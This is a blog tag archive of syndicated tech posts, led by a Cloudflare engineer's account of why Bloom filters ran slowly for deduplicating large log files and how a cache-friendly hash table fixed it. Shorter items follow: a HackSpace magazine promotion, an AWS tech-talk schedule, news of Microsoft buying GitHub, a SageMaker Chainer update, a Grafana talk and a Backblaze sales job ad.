Tag Archives: Tools

When Bloom filters don’t bloom

Post Syndicated from Marek Majkowski original https://blog.cloudflare.com/when-bloom-filters-dont-bloom/


I’ve known about Bloom filters (named after Burton Bloom) since university, but I haven’t had an opportunity to use them in anger. Last month this changed – I became fascinated with the promise of this data structure, but I quickly realized it had some drawbacks. This blog post is the tale of my brief love affair with Bloom filters.

While doing research about IP spoofing, I needed to examine whether the source IP addresses extracted from packets reaching our servers were legitimate, depending on the geographical location of our data centers. For example, source IPs belonging to a legitimate Italian ISP should not arrive in a Brazilian datacenter. This problem might sound simple, but in the ever-evolving landscape of the internet this is far from easy. Suffice it to say I ended up with many large text files with data like this:

192.0.2.1 107

This reads as: the IP 192.0.2.1 was recorded reaching Cloudflare data center number 107 with a legitimate request. This data came from many sources, including our active and passive probes, logs of certain domains we own (like cloudflare.com), public sources (like BGP table), etc. The same line would usually be repeated across multiple files.

I ended up with a gigantic collection of data of this kind. At some point I counted 1 billion lines across all the harvested sources. I usually write bash scripts to pre-process the inputs, but at this scale this approach wasn’t working. For example, removing duplicates from this tiny file of a meager 600MiB and 40M lines, took… about an eternity:


Enough to say that deduplicating lines using the usual bash commands like ‘sort’ in various configurations (see ‘--parallel’, ‘--buffer-size’ and ‘--unique’) was not optimal for such a large data set.

Bloom filters to the rescue


Image by David Eppstein Public Domain

Then I had a brainwave – it’s not necessary to sort the lines! I just need to remove duplicated lines – using some kind of "set" data structure should be much faster. Furthermore, I roughly know the cardinality of the input file (number of unique lines), and I can live with some data points being lost – using a probabilistic data structure is fine!

Bloom-filters are a perfect fit!

While you should go and read Wikipedia on Bloom Filters, here is how I look at this data structure.

How would you implement a "set"? Given a perfect hash function and infinite memory, we could just create an infinite bit array and set bit number ‘hash(item)’ for each item we encounter. This would give us a perfect "set" data structure. Right? Trivial. Sadly, hash functions have collisions and infinite memory doesn’t exist, so in reality we have to compromise. But we can calculate and manage the probability of collisions. For example, imagine we have a good hash function and 128GiB of memory. The probability that the second item added to the bit array collides with the first is 1 in 1099511627776. The probability of collision when adding further items worsens as we fill up the bit array.
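To make that number concrete, here is a quick back-of-the-envelope check in Python (128GiB of memory expressed as a count of bits):

bits = 128 * 2**30 * 8      # 128 GiB of memory, counted in bits
print(bits)                 # 1099511627776 possible bit positions
print(f"1 in {bits}")       # chance that the 2nd item collides with the 1st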

Furthermore, we could use more than one hash function, and end up with a denser bit array. This is exactly what Bloom filters optimize for. A Bloom filter is a bunch of math on top of the four variables:

  • ‘n’ – The number of input elements (cardinality)
  • ‘m’ – Memory used by the bit-array
  • ‘k’ – Number of hash functions counted for each input
  • ‘p’ – Probability of a false positive match

Given the ‘n’ input cardinality and the ‘p’ desired probability of false positive, the Bloom filter math returns the ‘m’ memory required and ‘k’ number of hash functions needed.
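In code, the textbook version of that math looks roughly like this. Note that, as described below, ‘mmuniq-bloom’ then fixes k=8 and rounds ‘m’ up to a power of two, so its actual numbers differ a bit from this optimum:

import math

def bloom_params(n, p):
    # Classic Bloom filter sizing: bits of memory 'm' and hash count 'k'
    # needed to store n items with a false positive probability of p.
    m = math.ceil(-n * math.log(p) / math.log(2) ** 2)
    k = max(1, round(m / n * math.log(2)))
    return m, k

m, k = bloom_params(40_000_000, 1e-4)
print(m / 8 / 2**20, k)     # roughly 91 MiB and 13 hash functions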

Check out this excellent visualization by Thomas Hurst showing how parameters influence each other:

mmuniq-bloom

Guided by this intuition, I set out on a journey to add a new tool to my toolbox – ‘mmuniq-bloom’, a probabilistic tool that, given input on STDIN, returns only unique lines on STDOUT, hopefully much faster than ‘sort’ + ‘uniq’ combo!

Here it is:

For simplicity and speed I designed ‘mmuniq-bloom’ with a couple of assumptions. First, unless otherwise instructed, it uses 8 hash functions (k=8). This seems to be close to the optimal number for the data sizes I’m working with, and the hash function can quickly output 8 decent hashes. Then we align ‘m’, the number of bits in the bit array, to a power of two. This is to avoid the pricey modulo (%) operation, which compiles down to the slow assembly ‘div’ instruction; with power-of-two sizes we can just do a bitwise AND. (For a fun read, see how compilers can optimize some divisions by using multiplication by a magic constant.)
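Purely for illustration, here is a minimal Python sketch of the same approach (k=8 hashes per line, a power-of-two bit array, bitwise AND instead of modulo). The real tool uses ‘siphash24’, so the blake2b call below is only a stand-in:

import sys
import hashlib

M_BITS = 1 << 30                  # 2^30 bits = 128MiB, a power of two
MASK = M_BITS - 1                 # lets us index with '&' instead of '%'
K = 8                             # hash functions per line
bits = bytearray(M_BITS // 8)

def indices(line):
    # Slice one 64-byte blake2b digest into K bit positions.
    d = hashlib.blake2b(line).digest()
    return [int.from_bytes(d[8*i:8*i+8], 'little') & MASK for i in range(K)]

for raw in sys.stdin.buffer:
    seen = True
    for h in indices(raw.rstrip(b'\n')):
        byte, bit = h >> 3, 1 << (h & 7)
        if not bits[byte] & bit:
            seen = False
            bits[byte] |= bit
    if not seen:
        sys.stdout.buffer.write(raw)

A line whose K bits are all already set is treated as a duplicate and dropped, which is exactly where the tunable false positive probability comes from.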

We can now run it against the same data file we used before:


Oh, this is so much better! 12 seconds is much more manageable than the 2 minutes before. But hold on… The program uses an optimized data structure, a relatively limited memory footprint, optimized line parsing and good output buffering, and yet 12 seconds is still an eternity compared to the ‘wc -l’ tool:


What is going on? I understand that counting lines by ‘wc’ is easier than figuring out unique lines, but is it really worth the 26x difference? Where does all the CPU in ‘mmuniq-bloom’ go?

It must be my hash function. ‘wc’ doesn’t need to spend all this CPU performing strange math for each of the 40M input lines. I’m using a pretty non-trivial ‘siphash24’ hash function, so it surely burns the CPU, right? Let’s check by running the code that computes the hash function but skips all the Bloom filter operations:


This is strange. Computing the hash function indeed costs about 2s, but the whole program took 12s in the previous run. Does the Bloom filter alone really take 10 seconds? How is that possible? It’s such a simple data structure…

A secret weapon – a profiler

It was time to use a proper tool for the task – let’s fire up a profiler and see where the CPU goes. First, let’s run ‘strace’ to confirm we are not making any unexpected syscalls:


Everything looks good. The 10 calls to ‘mmap’, each taking 4ms (3971 us), are intriguing, but that’s fine. We pre-populate the memory up front with ‘MAP_POPULATE’ to save on page faults later.

What is the next step? Of course Linux’s ‘perf’!


Then we can see the results:


Right, so we indeed burn 87.2% of cycles in our hot code. Let’s see where exactly. Doing ‘perf annotate process_line --source’ quickly shows something I didn’t expect.


You can see 26.90% of the CPU burned in the ‘mov’, but that’s not all of it! The compiler correctly inlined the function and unrolled the loop 8-fold. Summed up, that ‘mov’ (the ‘uint64_t v = *p’ line) accounts for the great majority of cycles!


Clearly ‘perf’ must be mistaken: how can such a simple line cost so much? We can repeat the benchmark with any other profiler and it will show us the same problem. For example, I like using ‘google-perftools’ with kcachegrind since they emit eye-candy charts:


The rendered result looks like this:


Allow me to summarise what we found so far.

The generic ‘wc’ tool takes 0.45s of CPU time to process the 600MiB file. Our optimized ‘mmuniq-bloom’ tool takes 12 seconds. The CPU is burned on one ‘mov’ instruction, dereferencing memory…


Image by Jose Nicdao CC BY/2.0

Oh! How could I have forgotten? Random memory access is slow! It’s very, very, very slow!

According to the rule of thumb "latency numbers every programmer should know", one RAM fetch is about 100ns. Let’s do the math: 40 million lines, 8 hashes computed for each line. Since our Bloom filter is 128MiB, on our older hardware it doesn’t fit into the L3 cache. The hashes are uniformly distributed across the large memory range – each hash generates a memory miss. Adding it together, that’s…
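The arithmetic is simple enough to redo:

lines = 40_000_000
hashes_per_line = 8
ram_fetch_ns = 100
print(lines * hashes_per_line * ram_fetch_ns / 1e9, 's')   # 32.0 s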


That suggests 32 seconds burned just on memory fetches. The real program is faster, taking only 12s. This is because, although the Bloom filter data does not completely fit into L3 cache, it still gets some benefit from caching. It’s easy to see with ‘perf stat -d’:


Right, so we should have had at least 320M LLC-load-misses, but we had only 280M. This still doesn’t explain why the program was running only 12 seconds. But it doesn’t really matter. What matters is that the number of cache misses is a real problem and we can only fix it by reducing the number of memory accesses. Let’s try tuning the Bloom filter to use only one hash function:


Ouch! That really hurt! The Bloom filter required 64 GiB of memory to get our desired false positive probability ratio of 1-error-per-10k-lines. This is terrible!

Also, it doesn’t seem like we improved much. It took the OS 22 seconds to prepare memory for us, but we still burned 11 seconds in userspace. I guess this time any benefits from hitting memory less often were offset by lower cache-hit probability due to drastically increased memory size. In previous runs we required only 128MiB for the Bloom filter!

Dumping Bloom filters altogether

This is getting ridiculous. To get the same false positive guarantees we either must use many hashes in the Bloom filter (like 8) and therefore many memory operations, or we can have 1 hash function but enormous memory requirements.

We aren’t really constrained by available memory; instead we want to optimize for fewer memory accesses. All we need is a data structure that requires at most 1 memory miss per item and uses less than 64 Gigs of RAM…

While we could think of more sophisticated data structures like a Cuckoo filter, maybe we can be simpler. How about a good old simple hash table with linear probing?

Image by Vadims Podāns

Welcome mmuniq-hash

Here you can find a tweaked version of mmuniq-bloom, but using a hash table:

Instead of storing bits as in the Bloom filter, we are now storing 64-bit hashes from the ‘siphash24’ function. This gives us much stronger probability guarantees, with a probability of false positives much better than one error in 10k lines.
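Purely as an illustration of the idea (the bucket count below is an arbitrary power of two chosen to keep the load factor low, not the real tool’s sizing, and blake2b again stands in for ‘siphash24’):

import sys
import hashlib

SIZE = 1 << 26                    # power-of-two bucket count, ~67M slots
MASK = SIZE - 1
table = [0] * SIZE                # 0 marks an empty bucket
                                  # (a real tool would use a flat 64-bit array)

def hash64(line):
    # Stand-in for siphash24: 64 bits of a blake2b digest.
    h = int.from_bytes(hashlib.blake2b(line, digest_size=8).digest(), 'little')
    return h or 1                 # avoid 0, which we reserve for "empty"

for raw in sys.stdin.buffer:
    h = hash64(raw.rstrip(b'\n'))
    i = h & MASK
    while table[i] and table[i] != h:     # linear probing
        i = (i + 1) & MASK
    if table[i] == 0:                     # first time we see this hash
        table[i] = h
        sys.stdout.buffer.write(raw)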

Let’s do the math. Adding a new item to a hash table already containing, say, 40M entries has a ‘40M/2^64’ chance of hitting a hash collision. This is about one in 461 billion – a reasonably low probability. But we are not adding one item to a pre-filled set! Instead we are adding 40M lines to an initially empty set. As per the birthday paradox, this has a much higher chance of hitting a collision at some point. A decent approximation is ‘~n^2/2m’, which in our case is ‘~(40M^2)/(2*(2^64))’. This is a chance of one in 23000. In other words, assuming we are using a good hash function, one in every 23 thousand random sets of 40M items will have a hash collision. This practical chance of hitting a collision is non-negligible, but it’s still better than with a Bloom filter and totally acceptable for my use case.
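The approximation is easy to sanity-check:

n = 40_000_000
m = 2**64
print(n**2 / (2 * m))       # ~4.3e-05, i.e. about 1 in 23,000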

The hash table code runs faster, has better memory access patterns and better false positive probability than the Bloom filter approach.


Don’t be scared by the "hash conflicts" line; it just indicates how full the hash table was. We are using linear probing, so when a bucket is already taken, we just pick the next bucket in line. In our case we had to skip over 0.7 buckets on average to find an empty slot in the table. This is fine and, since we iterate over the buckets in linear order, we can expect the memory to be nicely prefetched.

From the previous exercise we know our hash function accounts for about 2 seconds of this. Therefore, it’s fair to say the 40M memory hits take around 4 seconds.

Lessons learned

Modern CPUs are really good at sequential memory access when it’s possible to predict memory fetch patterns (see Cache prefetching). Random memory access on the other hand is very costly.

Advanced data structures are very interesting, but beware. Modern computers require cache-optimized algorithms. When working with large datasets that don’t fit in L3, prefer optimizing for a reduced number of loads over optimizing the amount of memory used.

I guess it’s fair to say that Bloom filters are great as long as they fit into the L3 cache. The moment this assumption is broken, they are terrible. This is not news: Bloom filters optimize for memory usage, not for memory access. For example, see the Cuckoo Filters paper.

Another thing is the ever-lasting discussion about hash functions. Frankly – in most cases it doesn’t matter. The cost of computing even a complex hash function like ‘siphash24’ is small compared to the cost of random memory access. In our case simplifying the hash function would bring only small benefits. The CPU time is simply spent somewhere else – waiting for memory!

One colleague often says: "You can assume modern CPUs are infinitely fast. They run at infinite speed until they hit the memory wall".

Finally, don’t repeat my mistakes. Everyone should start profiling with ‘perf stat -d’ and look at the "Instructions per cycle" (IPC) counter. If it’s below 1, it generally means the program is stuck waiting for memory. Values above 2 would be great; it would mean the workload is mostly CPU-bound. Sadly, I’m yet to see high values in the workloads I’m dealing with…

Improved mmuniq

With the help of my colleagues I’ve prepared a further improved version of the ‘mmuniq’ hash-table-based tool. See the code:

It is able to dynamically resize the hash table, to support inputs of unknown cardinality. Then, by using batching, it can effectively use the ‘prefetch’ CPU hint, speeding up the program by 35-40%. Beware: sprinkling the code with ‘prefetch’ rarely works. Instead, I specifically changed the flow of the algorithm to take advantage of this instruction. With all the improvements I got the run time down to 2.1 seconds:


The end

Writing this basic tool which tries to be faster than ‘sort | uniq’ combo revealed some hidden gems of modern computing. With a bit of work we were able to speed it up from more than two minutes to 2 seconds. During this journey we learned about random memory access latency, and the power of cache friendly data structures. Fancy data structures are exciting, but in practice reducing random memory loads often brings better results.

Hackspace magazine 9: tools, tools, tools

Post Syndicated from Andrew Gregory original https://www.raspberrypi.org/blog/hackspace-magazine-9/

Rejoice! It’s time for a new issue of Hackspace magazine, packed with things for you to make, build, hack, and create!


 

HackSpace magazine issue 9

Tools: they’re what separates humans from the apes! Whereas apes use whatever they find around them to get honey, pick pawpaws, and avoid prickly pears, we humans take the step of making things with which to make other things. That’s why in this issue of HackSpace magazine, we look at 50 essential tools to make you better at making (and by extension better at being a human). Take a look, decide which ones you need, and imagine the projects that will be possible with your shiny new stuff.

Konichiwakitty

In issue 9, we feature Konichiwakitty, known as Rachel Wong to her friends, who is taking the maker world by storm with her range of electronic wearables.



Alongside making wearables and researching stem cells, she also advocates for getting young people into crafting, including making their own wearables!

Helping

Remap is a fantastic organisation. It’s comprised of volunteer makers and builders who use their skills to adapt the world and build tech to help people with disabilities. Everyone in the maker community can do amazing stuff, and it’s wonderful that so many of you offer your time and skills for free to benefit people in need.

Music

The band Echo and the Bunnymen famously credited a drum machine as a band member, and with our tutorial, you too can build your own rhythm section using a Teensy microcontroller, a breadboard, and a few buttons.



And if that’s not enough electro beats for you, we’ve also got a guide to generating MIDI inputs with a joystick — because keyboards and frets are so passé.

Pi Wars

Having shiny new stuff on its own isn’t enough to spur most people to action. No, they need a reason to make, for example total mechanical dominance over their competitors. Offering an arena for such contests is the continuing mission of Tim Richardson, who along with Mike Horne created Pi Wars.



In its five-ish years, Pi Wars has become one of the biggest events on the UK maker calendar, with an inspired mix of robots, making, programming, and healthy competition. We caught up with Tim to find out how to make a maker event, what’s next for Pi Wars, and how to build a robot to beat the best.

Fame

Do you ever lie awake at night wondering how many strangers on the internet like you? If so (or if you have a business with a social media presence, which seems more likely), you might be interested in our tutorial for a social media follower counter.


This build takes raw numbers from the internet’s shouting forums and turns them into physical validation, so you can watch your follower count increase in real time as you shout into the void about whether Football’s Coming Home. 

And there’s more…

In this issue, you can also:

  • See how to use the Google AIY Projects Vision kit to turn a humble water pistol into a single-minded dousing machine that doesn’t feel pity, fear, or remorse
  • Find out how to make chocolate in whatever shape you want
  • Learn from a maker who put 20 hours work into a project only to melt her PCBs and have to start all over again (spoiler alert: it all worked out in the end)

All this, plus a bunch of reviews and many, many more projects to dig into, in Hackspace magazine issue 9.

Get your copy of HackSpace magazine

If you like the sound of this month’s content, you can find HackSpace magazine in WHSmith, Tesco, Sainsbury’s, and independent newsagents in the UK. If you live in the US, check out your local Barnes & Noble, Fry’s, or Micro Center next week. We’re also shipping to stores in Australia, Hong Kong, Canada, Singapore, Belgium, and Brazil, so be sure to ask your local newsagent whether they’ll be getting HackSpace magazine. And if you’d rather try before you buy, you can always download the free PDF.

Subscribe now

“Subscribe now” may not be subtle as a marketing message, but we really think you should. You’ll get the magazine early, plus a lovely physical paper copy, which has really good battery life.


Oh, and 12-month print subscribers get an Adafruit Circuit Playground Express loaded with inputs and sensors and ready for your next project.

The post Hackspace magazine 9: tools, tools, tools appeared first on Raspberry Pi.

AWS Online Tech Talks – June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-june-2018/

AWS Online Tech Talks – June 2018

Join us this month to learn about AWS services and solutions. New this month, we have a fireside chat with the GM of Amazon WorkSpaces and our 2nd episode of the “How to re:Invent” series. We’ll also cover best practices, deep dives, use cases and more! Join us and register today!

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

 

Analytics & Big Data

June 18, 2018 | 11:00 AM – 11:45 AM PT – Get Started with Real-Time Streaming Data in Under 5 Minutes – Learn how to use Amazon Kinesis to capture, store, and analyze streaming data in real-time including IoT device data, VPC flow logs, and clickstream data.
June 20, 2018 | 11:00 AM – 11:45 AM PT – Insights For Everyone – Deploying Data across your Organization – Learn how to deploy data at scale using AWS Analytics and QuickSight’s new reader role and usage based pricing.

 

AWS re:Invent
June 13, 2018 | 05:00 PM – 05:30 PM PT – Episode 2: AWS re:Invent Breakout Content Secret Sauce – Hear from one of our own AWS content experts as we dive deep into the re:Invent content strategy and how we maintain a high bar.
Compute

June 25, 2018 | 01:00 PM – 01:45 PM PT – Accelerating Containerized Workloads with Amazon EC2 Spot Instances – Learn how to efficiently deploy containerized workloads and easily manage clusters at any scale at a fraction of the cost with Spot Instances.

June 26, 2018 | 01:00 PM – 01:45 PM PT – Ensuring Your Windows Server Workloads Are Well-Architected – Get the benefits, best practices and tools on running your Microsoft Workloads on AWS leveraging a well-architected approach.

 

Containers
June 25, 2018 | 09:00 AM – 09:45 AM PT – Running Kubernetes on AWS – Learn about the basics of running Kubernetes on AWS, including how to set up masters, networking, and security, and how to add auto-scaling to your cluster.

 

Databases

June 18, 2018 | 01:00 PM – 01:45 PM PT – Oracle to Amazon Aurora Migration, Step by Step – Learn how to migrate your Oracle database to Amazon Aurora.
DevOps

June 20, 2018 | 09:00 AM – 09:45 AM PT – Set Up a CI/CD Pipeline for Deploying Containers Using the AWS Developer Tools – Learn how to set up a CI/CD pipeline for deploying containers using the AWS Developer Tools.

 

Enterprise & Hybrid
June 18, 2018 | 09:00 AM – 09:45 AM PT – De-risking Enterprise Migration with AWS Managed Services – Learn how enterprise customers are de-risking cloud adoption with AWS Managed Services.

June 19, 2018 | 11:00 AM – 11:45 AM PT – Launch AWS Faster using Automated Landing Zones – Learn how the AWS Landing Zone can automate the set up of best practice baselines when setting up new AWS Environments.

June 21, 2018 | 11:00 AM – 11:45 AM PT – Leading Your Team Through a Cloud Transformation – Learn how you can help lead your organization through a cloud transformation.

June 21, 2018 | 01:00 PM – 01:45 PM PT – Enabling New Retail Customer Experiences with Big Data – Learn how AWS can help retailers realize actual value from their big data and deliver on differentiated retail customer experiences.

June 28, 2018 | 01:00 PM – 01:45 PM PT – Fireside Chat: End User Collaboration on AWS – Learn how End User Compute services can help you deliver access to desktops and applications anywhere, anytime, using any device.
IoT

June 27, 2018 | 11:00 AM – 11:45 AM PT – AWS IoT in the Connected Home – Learn how to use AWS IoT to build innovative Connected Home products.

 

Machine Learning

June 19, 2018 | 09:00 AM – 09:45 AM PT – Integrating Amazon SageMaker into your Enterprise – Learn how to integrate Amazon SageMaker and other AWS Services within an Enterprise environment.

June 21, 2018 | 09:00 AM – 09:45 AM PT – Building Text Analytics Applications on AWS using Amazon Comprehend – Learn how you can unlock the value of your unstructured data with NLP-based text analytics.

 

Management Tools

June 20, 2018 | 01:00 PM – 01:45 PM PT – Optimizing Application Performance and Costs with Auto Scaling – Learn how selecting the right scaling option can help optimize application performance and costs.

 

Mobile
June 25, 2018 | 11:00 AM – 11:45 AM PT – Drive User Engagement with Amazon Pinpoint – Learn how Amazon Pinpoint simplifies and streamlines effective user engagement.

 

Security, Identity & Compliance

June 26, 2018 | 09:00 AM – 09:45 AM PT – Understanding AWS Secrets Manager – Learn how AWS Secrets Manager helps you rotate and manage access to secrets centrally.
June 28, 2018 | 09:00 AM – 09:45 AM PT – Using Amazon Inspector to Discover Potential Security Issues – See how Amazon Inspector can be used to discover security issues of your instances.

 

Serverless

June 19, 2018 | 01:00 PM – 01:45 PM PT – Productionize Serverless Application Building and Deployments with AWS SAM – Learn expert tips and techniques for building and deploying serverless applications at scale with AWS SAM.

 

Storage

June 26, 2018 | 11:00 AM – 11:45 AM PT – Deep Dive: Hybrid Cloud Storage with AWS Storage Gateway – Learn how you can reduce your on-premises infrastructure by using the AWS Storage Gateway to connect your applications to the scalable and reliable AWS storage services.
June 27, 2018 | 01:00 PM – 01:45 PM PT – Changing the Game: Extending Compute Capabilities to the Edge – Discover how to change the game for IIoT and edge analytics applications with AWS Snowball Edge plus enhanced Compute instances.
June 28, 2018 | 11:00 AM – 11:45 AM PT – Big Data and Analytics Workloads on Amazon EFS – Get best practices and deployment advice for running big data and analytics workloads on Amazon EFS.

Microsoft acquires GitHub

Post Syndicated from corbet original https://lwn.net/Articles/756443/rss

Here’s the press release announcing Microsoft’s agreement to acquire GitHub for a mere $7.5 billion. “GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.”

Amazon SageMaker Updates – Tokyo Region, CloudFormation, Chainer, and GreenGrass ML

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/sagemaker-tokyo-summit-2018/

Today, at the AWS Summit in Tokyo we announced a number of updates and new features for Amazon SageMaker. Starting today, SageMaker is available in Asia Pacific (Tokyo)! SageMaker also now supports CloudFormation. A new machine learning framework, Chainer, is now available in the SageMaker Python SDK, in addition to MXNet and TensorFlow. Finally, support for running Chainer models on several devices was added to AWS Greengrass Machine Learning.

Amazon SageMaker Chainer Estimator


Chainer is a popular, flexible, and intuitive deep learning framework. Chainer networks work on a “Define-by-Run” scheme, where the network topology is defined dynamically via forward computation. This is in contrast to many other frameworks which work on a “Define-and-Run” scheme where the topology of the network is defined separately from the data. A lot of developers enjoy the Chainer scheme since it allows them to write their networks with native python constructs and tools.

Luckily, using Chainer with SageMaker is just as easy as using a TensorFlow or MXNet estimator. In fact, it might even be a bit easier, since it’s likely you can take your existing scripts and use them to train on SageMaker with very few modifications. With TensorFlow or MXNet, users have to implement a train function with a particular signature. With Chainer your scripts can be a little bit more portable, as you can simply read from a few environment variables like SM_MODEL_DIR, SM_NUM_GPUS, and others. We can wrap our existing script in an if __name__ == '__main__': guard and invoke it locally or on SageMaker.


import argparse
import os

if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    # hyperparameters sent by the client are passed as command-line arguments to the script.
    parser.add_argument('--epochs', type=int, default=10)
    parser.add_argument('--batch-size', type=int, default=64)
    parser.add_argument('--learning-rate', type=float, default=0.05)

    # Data, model, and output directories
    parser.add_argument('--output-data-dir', type=str, default=os.environ['SM_OUTPUT_DATA_DIR'])
    parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR'])
    parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN'])
    parser.add_argument('--test', type=str, default=os.environ['SM_CHANNEL_TEST'])

    args, _ = parser.parse_known_args()

    # ... load from args.train and args.test, train a model, write model to args.model_dir.

Then, we can run that script locally or use the SageMaker Python SDK to launch it on some GPU instances in SageMaker. The hyperparameters will get passed to the script as command-line arguments and the environment variables above will be auto-populated. When we call fit, the input channels we pass will be populated in the SM_CHANNEL_* environment variables.


from sagemaker.chainer.estimator import Chainer
# Create my estimator
chainer_estimator = Chainer(
    entry_point='example.py',
    train_instance_count=1,
    train_instance_type='ml.p3.2xlarge',
    hyperparameters={'epochs': 10, 'batch-size': 64}
)
# Train my estimator
chainer_estimator.fit({'train': train_input, 'test': test_input})

# Deploy my estimator to a SageMaker Endpoint and get a Predictor
predictor = chainer_estimator.deploy(
    instance_type="ml.m4.xlarge",
    initial_instance_count=1
)

Now, instead of bringing your own Docker container for training and hosting with Chainer, you can just maintain your script. You can see the full sagemaker-chainer-containers on GitHub. One of my favorite features of the new container is built-in chainermn for easy multi-node distribution of your Chainer training jobs.

There’s a lot more documentation and information available in both the README and the example notebooks.

AWS GreenGrass ML with Chainer

AWS GreenGrass ML now includes a pre-built Chainer package for all devices powered by Intel Atom, NVIDIA Jetson TX2, and Raspberry Pi. So, now GreenGrass ML provides pre-built packages for TensorFlow, Apache MXNet, and Chainer! You can train your models on SageMaker and then easily deploy them to any GreenGrass-enabled device using GreenGrass ML.

JAWS UG

I want to give a quick shout out to all of our wonderful and inspirational friends in the JAWS UG who attended the AWS Summit in Tokyo today. I’ve very much enjoyed seeing your pictures of the summit. Thanks for making Japan an amazing place for AWS developers! I can’t wait to visit again and meet with all of you.

Randall

Monitoring with Azure and Grafana

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/05/31/monitoring-with-azure-and-grafana/

What is whitebox monitoring?
Why do we monitor our systems?
What is the Azure Monitor plugin and how can I use it to monitor my Azure resources?
Recently, I spoke at Swetugg 2018, a .NET conference held in Stockholm, Sweden, to answer these questions. In this video you’ll learn some basic monitoring principles, some of the tools we use to monitor our systems, and get an inside look at the new Azure Monitor plugin for Grafana.

Hiring a Director of Sales

Post Syndicated from Yev original https://www.backblaze.com/blog/hiring-a-director-of-sales/

Backblaze is hiring a Director of Sales. This is a critical role for Backblaze as we continue to grow the team. We need a strong leader who has experience in scaling a sales team and who has an excellent track record for exceeding goals by selling Software as a Service (SaaS) solutions. In addition, this leader will need to be highly motivated, as well as able to create and develop a highly-motivated, success oriented sales team that has fun and enjoys what they do.

The History of Backblaze from our CEO
In 2007, after a friend’s computer crash caused her some suffering, we realized that with every photo, video, song, and document going digital, everyone would eventually lose all of their information. Five of us quit our jobs to start a company with the goal of making it easy for people to back up their data.

Like many startups, for a while we worked out of a co-founder’s one-bedroom apartment. Unlike most startups, we made an explicit agreement not to raise funding during the first year. We would then touch base every six months and decide whether to raise or not. We wanted to focus on building the company and the product, not on pitching and slide decks. And critically, we wanted to build a culture that understood money comes from customers, not the magical VC giving tree. Over the course of 5 years we built a profitable, multi-million dollar revenue business — and only then did we raise a VC round.

Fast forward 10 years later and our world looks quite different. You’ll have some fantastic assets to work with:

  • A brand millions recognize for openness, ease-of-use, and affordability.
  • A computer backup service that stores over 500 petabytes of data, has recovered over 30 billion files for hundreds of thousands of paying customers — most of whom self-identify as being the people that find and recommend technology products to their friends.
  • Our B2 service that provides the lowest cost cloud storage on the planet at 1/4th the price Amazon, Google or Microsoft charges. While being a newer product on the market, it already has over 100,000 IT and developers signed up as well as an ecosystem building up around it.
  • A growing, profitable and cash-flow positive company.
  • And last, but most definitely not least: a great sales team.

You might be saying, “sounds like you’ve got this under control — why do you need me?” Don’t be misled. We need you. Here’s why:

  • We have a great team, but we are in the process of expanding and we need to develop a structure that will easily scale and provide the most success to drive revenue.
  • We just launched our outbound sales efforts and we need someone to help develop that into a fully successful program that’s building a strong pipeline and closing business.
  • We need someone to work with the marketing department and figure out how to generate more inbound opportunities that the sales team can follow up on and close.
  • We need someone who will work closely in developing the skills of our current sales team and build a path for career growth and advancement.
  • We want someone to manage our Customer Success program.

So that’s a bit about us. What are we looking for in you?

Experience: As a sales leader, you will strategically build and drive the territory’s sales pipeline by assembling and leading a skilled team of sales professionals. This leader should be familiar with generating, developing and closing software subscription (SaaS) opportunities. We are looking for a self-starter who can manage a team and make an immediate impact of selling our Backup and Cloud Storage solutions. In this role, the sales leader will work closely with the VP of Sales, marketing staff, and service staff to develop and implement specific strategic plans to achieve and exceed revenue targets, including new business acquisition as well as build out our customer success program.

Leadership: We have an experienced team who’s brought us to where we are today. You need to have the people and management skills to get them excited about working with you. You need to be a strong leader and compassionate about developing and supporting your team.

Data driven and creative: The data has to show something makes sense before we scale it up. However, without creativity, it’s easy to say “the data shows it’s impossible” or to find a local maximum. Whether it’s deciding how to scale the team, figuring out what our outbound sales efforts should look like or putting a plan in place to develop the team for career growth, we’ve seen a bit of creativity get us places a few extra dollars couldn’t.

Jive with our culture: Strong leaders affect culture and the person we hire for this role may well shape, not only fit into, ours. But to shape the culture you have to be accepted by the organism, which means a certain set of shared values. We default to openness with our team, our customers, and everyone if possible. We love initiative — without arrogance or dictatorship. We work to create a place people enjoy showing up to work. That doesn’t mean ping pong tables and foosball (though we do try to have perks & fun), but it means people are friendly, non-political, working to build a good service but also a good place to work.

Do the work: Ideas and strategy are critical, but good execution makes them happen. We’re looking for someone who can help the team execute both from the perspective of being capable of guiding and organizing, but also someone who is hands-on themselves.

Additional Responsibilities needed for this role:

  • Recruit, coach, mentor, manage and lead a team of sales professionals to achieve yearly sales targets. This includes closing new business and expanding upon existing clientele.
  • Expand the customer success program to provide the best customer experience possible resulting in upsell opportunities and a high retention rate.
  • Develop effective sales strategies and deliver compelling product demonstrations and sales pitches.
  • Acquire and develop the appropriate sales tools to make the team efficient in their daily work flow.
  • Apply a thorough understanding of the marketplace, industry trends, funding developments, and products to all management activities and strategic sales decisions.
  • Ensure that sales department operations function smoothly, with the goal of facilitating sales and/or closings; operational responsibilities include accurate pipeline reporting and sales forecasts.
  • This position will report directly to the VP of Sales and will be staffed in our headquarters in San Mateo, CA.

Requirements:

  • 7 – 10+ years of successful sales leadership experience as measured by sales performance against goals.
  • Experience in developing skill sets and providing career growth and opportunities through advancement of team members.
  • Background in selling SaaS technologies with a strong track record of success.
  • Strong presentation and communication skills.
  • Must be able to travel occasionally nationwide.
  • BA/BS degree required

Think you want to join us on this adventure?
Send an email to jobscontact@backblaze.com with the subject “Director of Sales.” (Recruiters and agencies, please don’t email us.) Include a resume and answer these two questions:

  1. How would you approach evaluating the current sales team and what is your process for developing a growth strategy to scale the team?
  2. What are the goals you would set for yourself in the 3 month and 1-year timeframes?

Thank you for taking the time to read this and I hope that this sounds like the opportunity for which you’ve been waiting.

Backblaze is an Equal Opportunity Employer.

The post Hiring a Director of Sales appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Amazon Neptune Generally Available

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/amazon-neptune-generally-available/

